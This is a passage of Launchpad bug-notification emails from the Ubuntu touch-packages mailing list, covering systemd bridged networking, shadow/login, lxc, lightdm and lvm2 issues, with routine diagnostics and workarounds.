Same problem for me on Raspi 4 (bridged networking) I have found a quick and dirty workaround: In crontab: @reboot root netplan apply -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1860926 Title: Ubuntu 20.04 Systemd fails to configure bridged network Status in systemd package in Ubuntu: Confirmed Status in systemd source package in Focal: Confirmed Bug description: [impact] A bridged interface with static ipv4 address and gateway configuration will fail to properly add the route via the gateway, leaving the system without a globally working network. [test case] On a Focal system, remove all network configuration and create this netplan: network: version: 2 renderer: networkd ethernets: enp4s0: dhcp4: false bridges: br0: interfaces: [enp4s0] dhcp4: no addresses: [192.168.0.4/24] gateway4: 192.168.0.1 nameservers: search: [mydomain] addresses: [192.168.0.1,192.168.0.2,192.168.0.3] Replace the interface name 'enp4s0' with the actual interface name on the test system. Reboot the system, and check the route to the gateway, which will be missing: root@lp1860926-f:~# ip r 192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.4 The route is expected to be present, e.g.: ubuntu@lp1860926-e:~$ ip r default via 192.168.0.1 dev br0 proto static 192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.4 [regression potential] Not SRU - N/A [scope] This is not reproducable on Eoan or Bionic; this is needed only for Focal. [original description] Freshly installed Ubuntu 20.04 fully patched to days date with static IP address works fine and survives a reboot network: version: 2 renderer: networkd ethernets: enp4s0: dhcp4: false addresses: [192.168.0.4/24] gateway4: 192.168.0.1 nameservers: search: [mydomain] addresses: [192.168.0.1,192.168.0.2,192.168.0.3] however when converted to a bridged network for kvm network: version: 2 renderer: networkd ethernets: enp4s0: dhcp4: false bridges: br0: interfaces: [enp4s0] dhcp4: no addresses: [192.168.0.4/24] gateway4: 192.168.0.1 nameservers: search: [mydomain] addresses: [192.168.0.1,192.168.0.2,192.168.0.3] will not survive a reboot and required systemd-network to be restarted or @reboot /usr/sbin/netplan apply added to the crontab after a reboot the network can not b eaccseed and a systemctl status systemd-networkd produces systemd-networkd.service - Network Service Loaded: loaded (/lib/systemd/system/systemd-networkd.service; enabled; vendor preset: enabled) Active: active (running) since Sun 2020-01-26 16:36:28 UTC; 2min 27s ago TriggeredBy: ● systemd-networkd.socket Docs: man:systemd-networkd.service(8) Main PID: 979 (systemd-network) Status: "Processing requests..." Tasks: 1 (limit: 57662) Memory: 4.1M CGroup: /system.slice/systemd-networkd.service └─979 /lib/systemd/systemd-networkd Jan 26 16:38:02 firebolt systemd-networkd[979]: rtnl: received neighbor for link '5' we don't know about, ignoring. Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: rtnl: received neighbor message with invalid family, ignoring. Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: rtnl: received neighbor message with invalid family, ignoring. Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0: rtnl: received neighbor message with invalid family, ignoring. Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Link UP Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Gained carrier Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0: Link UP Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Link DOWN Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Lost carrier Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Kernel removed an address we don't remember: fe80::5054:ff:fed9:7e26/64 (valid forever), ignoring. systemctl restart systemd-networkd resolved the issue and a systemctl status systemd-network producessystemd-networkd.service - Network Service Loaded: loaded (/lib/systemd/system/systemd-networkd.service; enabled; vendor preset: enabled) Active: active (running) since Sun 2020-01-26 16:39:28 UTC; 41s ago TriggeredBy: ● systemd-networkd.socket Docs: man:systemd-networkd.service(8) Main PID: 1650 (systemd-network) Status: "Processing requests..." Tasks: 1 (limit: 57662) Memory: 1.6M CGroup: /system.slice/systemd-networkd.service └─1650
[Touch-packages] [Bug 1817496] Re: Login always shows partitions to be fsck-ed, even after reboot.
You should be able to manually do fsck /dev/sda5 If the filesystem on sda5 is listed in /etc/fstab, then sixth fstab field for that filesystem should be '2'. If it is 0, then indeed it won't be fsck'd on reboot. fstab is owned by util-linux, but system bringup belongs to systemd, so I'm assigning this to the systemd package. However I suspect fstab lists '0' for the sixth field, and the system is doing what it is told. ** Package changed: shadow (Ubuntu) => systemd (Ubuntu) ** Changed in: systemd (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1817496 Title: Login always shows partitions to be fsck-ed, even after reboot. Status in systemd package in Ubuntu: Incomplete Bug description: This system reports /dev/sda5 will be checked on the next reboot. Maybe it is (it's EXT4 on as SSD drive, so it could be too fast to notice), but the message persists even after such a reboot. I would expect it to go away. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: login 1:4.5-1ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18 Uname: Linux 4.15.0-45-generic x86_64 NonfreeKernelModules: wl ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Sun Feb 24 17:27:50 2019 SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1817496/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1817496] Re: Login always shows partitions to be fsck-ed, even after reboot.
Please show the results of 'mount | grep sda5' and the contents of /etc/fstab. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1817496 Title: Login always shows partitions to be fsck-ed, even after reboot. Status in systemd package in Ubuntu: Incomplete Bug description: This system reports /dev/sda5 will be checked on the next reboot. Maybe it is (it's EXT4 on as SSD drive, so it could be too fast to notice), but the message persists even after such a reboot. I would expect it to go away. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: login 1:4.5-1ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18 Uname: Linux 4.15.0-45-generic x86_64 NonfreeKernelModules: wl ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Sun Feb 24 17:27:50 2019 SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1817496/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1808864] Re: Poor translation of zh_CN gpasswd(1) man page
Would you mind comparing this to the new version at https://github.com/shadow-maint/shadow/blob/master/po/zh_CN.po ? I looked for the 'administrator' one, and that seems fixed. Any other updates you have which you could post as pull requests against the upstream project would be greatly appreciated. ** Changed in: shadow (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to language-pack-zh-hans in Ubuntu. https://bugs.launchpad.net/bugs/1808864 Title: Poor translation of zh_CN gpasswd(1) man page Status in Ubuntu Translations: New Status in language-pack-zh-hans package in Ubuntu: New Status in shadow package in Ubuntu: Incomplete Bug description: man -l /usr/share/man/zh_CN/man1/gpasswd.1.gz The zh_CN version of gpasswd(1) not only is partially done, but also contains an error in the first sentence. The translator confused the verb "administer" with the person "administrator." The section heading, originally "Notes (noun) about group passwords," was translated as "Please note (verb) the group passwords." Even Google translate does better! Translation errors == gpasswd - administer /etc/group and /etc/gshadow gpasswd - 管理员 /etc/group 和 /etc/gshadow ^^ 管理员 -- administrator 管理 -- administer Notes about group passwords 请注意组密码 ^^ 请注意…… -- please note (v.) 关于……的说明 -- notes (n.) about Typos = -h, --help Display help message and exit. -h, --help 现实帮助信息并退出。 显示 Xiǎnshì -- display 现实 Xiànshí -- reality Correct Google translate results (this but unironically) "gpasswd - administer /etc/group and /etc/gshadow" "gpasswd - 管理 /etc/group 和 /etc/gshadow" "Notes about group passwords" "关于组密码的说明" "Display help message and exit." "显示帮助消息并退出。" Notes about my system = $ lsb_release -rd Description:Ubuntu 18.04.1 LTS Release:18.04 $ apt-cache policy passwd passwd: Installed: 1:4.5-1ubuntu1 Candidate: 1:4.5-1ubuntu1 Version table: *** 1:4.5-1ubuntu1 500 500 http://us.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu-translations/+bug/1808864/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1811893] Re: In Ubuntu on Virtualbox, the screen is blank after sign-in
Thanks for reporting this bug. This looks to be a bug with either xubuntu login manager or xubuntu default X11 session, so I'm reassigning it to lightdm. ** Package changed: shadow (Ubuntu) => lightdm (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lightdm in Ubuntu. https://bugs.launchpad.net/bugs/1811893 Title: In Ubuntu on Virtualbox, the screen is blank after sign-in Status in lightdm package in Ubuntu: New Bug description: I installed xubuntu in my Windows box using the latest VBOX (6.0). It installed perfectly however after I log in the screen kind of freezes. I see the background however the icons and title bar do not appear. Also mouse inputs like right click do not work. Function keys do not work either like alt F2. Xubuntu system is updated and the guest addons are installed. I have tried disbling the 3d acceleration however that did not work. The only way I can get this to load the icons is to go to Devices -> Insert Guest Additions CD Image. Once I click on Insert Guest Additions the icons and title bar load and everything works fine. I checked online for solutions but have not found any that work. This also seems to be a problem with other versions of Ubuntu and other Linux distributions. xubuntu 10.04.1 Description: Ubuntu 18.04.1 LTS Release: 18.04 ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: login 1:4.5-1ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-43.46-generic 4.15.18 Uname: Linux 4.15.0-43-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: XFCE Date: Tue Jan 15 15:20:31 2019 InstallationDate: Installed on 2019-01-15 (0 days ago) InstallationMedia: Xubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) ProcEnviron: LANGUAGE=en_US PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1811893/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1872443] Re: /etc/securetty missing: dovecot not working
This was a decision made by the debian package (see https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=771675 ). Would you mind raising a bug against pam and shadow in debian bringing this up? Perhaps the libpam-modules package should supply it alongside the pam_securetty.so. Please let us know if you're not comfortable doing that. ** Bug watch added: Debian Bug tracker #771675 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=771675 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1872443 Title: /etc/securetty missing: dovecot not working Status in shadow package in Ubuntu: New Bug description: With Ubuntu 20.04 Focal Fossa, /etc/securetty is missing from the "login" package (4.8.1-1ubuntu4). This leads to errors such as in /var/log/mail.log when a dovecot auth is tried: Apr 13 13:08:17 venus dovecot[10588]: imap-login: Login: user=, method=PLAIN, rip=192.168.123.1, lip=192.168.123.188, mpid=12200, TLS, TLSv1.2 with cipher ECDHE-E CDSA-AES256-GCM-SHA384 (256/256 bits) Apr 13 13:08:18 venus auth[12195]: pam_unix(dovecot:auth): Couldn't open /etc/secure tty: No such file or directory Apr 13 13:08:18 venus auth[12195]: pam_unix(dovecot:auth): Couldn't open /etc/secure tty: No such file or directory Apr 13 13:08:18 venus dovecot[10588]: imap-login: Login: user=, method=PLAIN, rip=192.168.123.1, lip=192.168.123.188, mpid=12202, TLS, TLSv1.2 with cipher ECDHE-E CDSA-AES256-GCM-SHA384 (256/256 bits) It seems that pam_unix still needs /etc/securetty, but login no longer provides it. There was a similar bug in debian that seems to be related: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931899 To my understanding, this is a problem between pam and login packages in 20.04. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1872443/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 998816] Re: Login password is shown in plaintext
Note this was wishlist in shadow, but i can't find wishlist in the list of options any more. ** Changed in: util-linux (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to util-linux in Ubuntu. https://bugs.launchpad.net/bugs/998816 Title: Login password is shown in plaintext Status in util-linux package in Ubuntu: Confirmed Bug description: This bug was originally posted on kernel.org but it was closed because it seems to be a non-related kernel bug: https://bugzilla.kernel.org/show_bug.cgi?id=21272 I'm currently using Ubuntu 12.10 dev and the bug still exists there. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/998816/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 998816] Re: Login password is shown in plaintext
This is actually a bug in getty, which accepts the username and then starts login. ** Package changed: shadow (Ubuntu) => util-linux (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to util-linux in Ubuntu. https://bugs.launchpad.net/bugs/998816 Title: Login password is shown in plaintext Status in util-linux package in Ubuntu: Confirmed Bug description: This bug was originally posted on kernel.org but it was closed because it seems to be a non-related kernel bug: https://bugzilla.kernel.org/show_bug.cgi?id=21272 I'm currently using Ubuntu 12.10 dev and the bug still exists there. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/998816/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 600653] Re: passwd man mistake minage -m should be -n
** Changed in: shadow (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/600653 Title: passwd man mistake minage -m should be -n Status in shadow package in Ubuntu: Fix Released Bug description: root@XX:/etc/pam.d# cat /etc/issue Ubuntu 8.10 \n \l root@X:/etc/pam.d# man passwd | grep min -m, --mindays MIN_DAYS Set the minimum number of days between password changes to of the last password change. The next four fields are the minimum root@onmsip02:/etc/pam.d# passwd -m 1 root passwd: invalid option -- 'm' Usage: passwd [options] [LOGIN] Options: -a, --all report password status on all accounts -d, --delete delete the password for the named account -e, --expire force expire the password for the named account -h, --helpdisplay this help message and exit -k, --keep-tokens change password only if expired -i, --inactive INACTIVE set password inactive after expiration to INACTIVE -l, --locklock the named account -n, --mindays MIN_DAYSset minimum number of days before password change to MIN_DAYS -q, --quiet quiet mode -r, --repository REPOSITORY change password in REPOSITORY repository -S, --status report password status on the named account -u, --unlock unlock the named account -w, --warndays WARN_DAYS set expiration warning days to WARN_DAYS -x, --maxdays MAX_DAYSset maximim number of days before password change to MAX_DAYS root@X:/etc/pam.d# passwd -n 1 root && echo $? Password changed. 0 root@:/etc/pam.d# To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/600653/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1759247] Re: lxc-copy forgets to change /etc/hostname and /etc/hosts
Tested this in eoan - hostname had the new name. ** Changed in: lxc (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1759247 Title: lxc-copy forgets to change /etc/hostname and /etc/hosts Status in lxc package in Ubuntu: Fix Released Bug description: LXC 2.x behaved like this when cloning containers: it wrote the new hostname into /etc/hostname of the new container, and changed /etc/hosts accordingly. LXC 3.0.0.beta3 no longer does it. root@zh1cn:/var/lib/lxc# lxc-create -t download -n ubuntu-1604-new -- -d ubuntu -a amd64 -r xenial Setting up the GPG keyring Downloading the image index Downloading the rootfs Downloading the metadata The image cache is now ready Unpacking the rootfs --- You just created an Ubuntu container (release=xenial, arch=amd64, variant=default) To enable sshd, run: apt-get install openssh-server For security reason, container images ship without user accounts and without a root password. Use lxc-attach or chroot directly into the rootfs to set a root password or create user accounts. root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new/config # Template used to create this container: /usr/share/lxc/templates/lxc-download # Parameters passed to the template: -d ubuntu -a amd64 -r xenial # Template script checksum (SHA-1): 5f6cea9c51537459a7ab5f81e2c1eac6a94b5e08 # For additional config options, please look at lxc.container.conf(5) # Uncomment the following line to support nesting containers: #lxc.include = /usr/share/lxc/config/nesting.conf # (Be aware this has security implications) # Distribution configuration lxc.include = /usr/share/lxc/config/common.conf lxc.arch = x86_64 # Container specific configuration lxc.rootfs.path = dir:/var/lib/lxc/ubuntu-1604-new/rootfs lxc.uts.name = ubuntu-1604-new # Network configuration lxc.net.0.type = veth lxc.net.0.link = lxcbr0 lxc.net.0.flags = up lxc.net.0.hwaddr = 00:16:3e:65:85:6b root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new/rootfs/etc/hostname ubuntu-1604-new root@zh1cn:/var/lib/lxc# lxc-copy -n ubuntu-1604-new -N ubuntu-1604-new1 root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new1/config # Template used to create this container: /usr/share/lxc/templates/lxc-download # Parameters passed to the template: -d ubuntu -a amd64 -r xenial # Template script checksum (SHA-1): 5f6cea9c51537459a7ab5f81e2c1eac6a94b5e08 # For additional config options, please look at lxc.container.conf(5) # Uncomment the following line to support nesting containers: #lxc.include = /usr/share/lxc/config/nesting.conf # (Be aware this has security implications) # Distribution configuration lxc.include = /usr/share/lxc/config/common.conf lxc.arch = x86_64 # Container specific configuration # Network configuration lxc.net.0.type = veth lxc.net.0.link = lxcbr0 lxc.net.0.flags = up lxc.net.0.hwaddr = 00:16:3e:ec:9a:54 lxc.rootfs.path = dir:/var/lib/lxc/ubuntu-1604-new1/rootfs lxc.uts.name = ubuntu-1604-new1 root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new1/rootfs/etc/hostname ubuntu-1604-new I would expect ubuntu-1604-new1 here, or maybe no such file at all (so that lxc.uts.name applies from the config). ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: lxc 3.0.0~beta3-0ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-12.13-generic 4.15.7 Uname: Linux 4.15.0-12-generic x86_64 ApportVersion: 2.20.9-0ubuntu1 Architecture: amd64 Date: Tue Mar 27 19:21:21 2018 InstallationDate: Installed on 2018-01-25 (61 days ago) InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180120) PackageArchitecture: all ProcEnviron: LANG=en_US.UTF-8 TERM=xterm SHELL=/bin/bash PATH=(custom, no user) SourcePackage: lxc UpgradeStatus: No upgrade log present (probably fresh install) defaults.conf: lxc.net.0.type = veth lxc.net.0.link = lxcbr0 lxc.net.0.flags = up lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1759247/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1321854] Re: useradd doesn't add the default shell to /etc/passwd entry
Tested this in eoan. New user got the SHELL=zsh which I specified in /etc/default/useradd ** Changed in: shadow (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1321854 Title: useradd doesn't add the default shell to /etc/passwd entry Status in shadow package in Ubuntu: Fix Released Status in shadow source package in Trusty: Triaged Bug description: useradd is not honoring the default shell listed in /etc/defaults/useradd when creating new users. useradd -D showing the defaults. SHELL=/bin/bash # useradd -D GROUP=100 HOME=/home INACTIVE=-1 EXPIRE= SHELL=/bin/bash SKEL=/etc/skel CREATE_MAIL_SPOOL=no Using useradd to create user test1. The /etc/passwd entry has a blank shell field: # useradd test1 # grep test1 /etc/passwd test1:x:2080:2080::/home/test1: Using useradd -s does populate the shell field: # useradd -s /bin/bash test2 #grep test2 /etc/passwd test2:x:2081:2081::/home/test2:/bin/bash Why useradd instead of adduser: puppet uses useradd to do user creation. ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: passwd 1:4.1.5.1-1ubuntu9 ProcVersionSignature: Ubuntu 3.13.0-24.47-generic 3.13.9 Uname: Linux 3.13.0-24-generic x86_64 ApportVersion: 2.14.1-0ubuntu3 Architecture: amd64 Date: Wed May 21 17:51:57 2014 Ec2AMI: ami-42dc302a Ec2AMIManifest: (unknown) Ec2AvailabilityZone: us-east-1d Ec2InstanceType: m3.large Ec2Kernel: aki-919dcaf8 Ec2Ramdisk: unavailable ProcEnviron: TERM=xterm PATH=(custom, no user) LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) mtime.conffile..etc.default.useradd: 2014-05-21T17:36:05.208686 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1321854/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1174939] Re: [HDA-Intel - HDA Intel PCH, playback] Sound is distorted
Not the issue anymore -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to alsa-driver in Ubuntu. https://bugs.launchpad.net/bugs/1174939 Title: [HDA-Intel - HDA Intel PCH, playback] Sound is distorted Status in alsa-driver package in Ubuntu: Incomplete Bug description: time after time blayback sound is broke and it sound like "digital" noice with normaly (see example fil. Sorry for bad quality, recording from microphone) ProblemType: Bug DistroRelease: Ubuntu 13.04 Package: alsa-base 1.0.25+dfsg-0ubuntu4 ProcVersionSignature: Ubuntu 3.8.0-19.29-generic 3.8.8 Uname: Linux 3.8.0-19-generic x86_64 NonfreeKernelModules: nvidia ApportVersion: 2.9.2-0ubuntu8 Architecture: amd64 Date: Tue Apr 30 23:57:15 2013 InstallationDate: Installed on 2012-12-10 (140 days ago) InstallationMedia: Ubuntu 12.10 "Quantal Quetzal" - Release amd64 (20121017.5) MarkForUpload: True PackageArchitecture: all SourcePackage: alsa-driver Symptom: audio Symptom_AlsaPlaybackTest: ALSA playback test through plughw:PCH successful Symptom_Card: Webcam C310 - USB Device 0x46d:0x81b Symptom_PulsePlaybackTest: PulseAudio playback test successful Symptom_Type: Digital clip or distortion, or "overdriven" sound Title: [HDA-Intel - HDA Intel PCH, playback] Sound is distorted UpgradeStatus: Upgraded to raring on 2013-04-25 (5 days ago) dmi.bios.date: 07/24/2012 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: V10.4 dmi.board.asset.tag: To be filled by O.E.M. dmi.board.name: B75A-G43 (MS-7758) dmi.board.vendor: MSI dmi.board.version: 2.0 dmi.chassis.asset.tag: To Be Filled By O.E.M. dmi.chassis.type: 3 dmi.chassis.vendor: MSI dmi.chassis.version: 2.0 dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrV10.4:bd07/24/2012:svnMSI:pnMS-7758:pvr2.0:rvnMSI:rnB75A-G43(MS-7758):rvr2.0:cvnMSI:ct3:cvr2.0: dmi.product.name: MS-7758 dmi.product.version: 2.0 dmi.sys.vendor: MSI To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1174939/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1840375] Re: groupdel doesn't support extrausers
Hi, can I interest anyone in pushing the extrausers patch as a PR to github.com/shadow-maint/shadow? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1840375 Title: groupdel doesn't support extrausers Status in snapd: New Status in shadow package in Ubuntu: Fix Released Status in shadow source package in Xenial: Fix Committed Status in shadow source package in Bionic: Fix Committed Status in shadow source package in Disco: Fix Committed Bug description: snapd needs the ability to call 'groupdel --extrausers foo' to clean up after itself, but --extrausers is currently unsupported. [Impact] On ubuntu-core systems we want to be able to manage "extrausers" in the same way as regular users. This requires updates to the various {user,group}{add,del} tools. Right now "groupdel" cannot handle extrausers. This is an important feature for Ubuntu Core [Test Case] 1. install the libnss-extrausers and configure it 2. run "groupadd --extrausers foo" 3 check /var/lib/extrausers/group for the new "foo" group 4. run "groupdel --extrausers foo" 5. check /var/lib/extrausers/group and ensure the "foo" group is removed [Regression Potential] * low: this adds a new (optional) option which is off by default To manage notifications about this bug go to: https://bugs.launchpad.net/snapd/+bug/1840375/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1757091] Re: systemctl enable lightdm
Is there a workaround tip in order to re-enable lightdm in ubuntu 18.04 ? I am using systemd. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lightdm in Ubuntu. https://bugs.launchpad.net/bugs/1757091 Title: systemctl enable lightdm Status in lightdm package in Ubuntu: Confirmed Bug description: Synchronizing state of lightdm.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable lightdm The unit files have no installation config (WantedBy, RequiredBy, Also, Alias settings in the [Install] section, and DefaultInstance for template units). This means they are not meant to be enabled using systemctl. Possible reasons for having this kind of units are: 1) A unit may be statically enabled by being symlinked from another unit's .wants/ or .requires/ directory. 2) A unit's purpose may be to act as a helper for some other unit which has a requirement dependency on it. 3) A unit may be started when needed via activation (socket, path, timer, D-Bus, udev, scripted systemctl call, ...). 4) In case of template units, the unit is meant to be enabled with some instance name specified. ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: lightdm 1.24.0-0ubuntu1 ProcVersionSignature: Ubuntu 4.13.0-37.42-generic 4.13.13 Uname: Linux 4.13.0-37-generic x86_64 NonfreeKernelModules: nvidia_uvm nvidia_drm nvidia_modeset nvidia ApportVersion: 2.20.7-0ubuntu3.7 Architecture: amd64 Date: Tue Mar 20 11:44:46 2018 InstallationDate: Installed on 2018-01-22 (57 days ago) InstallationMedia: Ubuntu-Server 17.10 "Artful Aardvark" - Release amd64 (20171017.1) ProcEnviron: TERM=xterm PATH=(custom, no user) LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: lightdm UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1757091/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1782825] [NEW] missing symlink for library
Public bug reported: On bionic, I needed to ln -s /lib/x86_64-linux-gnu/libdevmapper.so.1.02.1 /lib/x86_64-linux- gnu/libdevmapper.so.1.02 in order for some previously built programs (like skopeo) to continue to work. ** Affects: lvm2 (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lvm2 in Ubuntu. https://bugs.launchpad.net/bugs/1782825 Title: missing symlink for library Status in lvm2 package in Ubuntu: New Bug description: On bionic, I needed to ln -s /lib/x86_64-linux-gnu/libdevmapper.so.1.02.1 /lib/x86_64-linux- gnu/libdevmapper.so.1.02 in order for some previously built programs (like skopeo) to continue to work. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1782825/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1778984] [NEW] Parse error of /etc/apparmor.d/tunables/home.d/ubuntu after unattended-upgrades
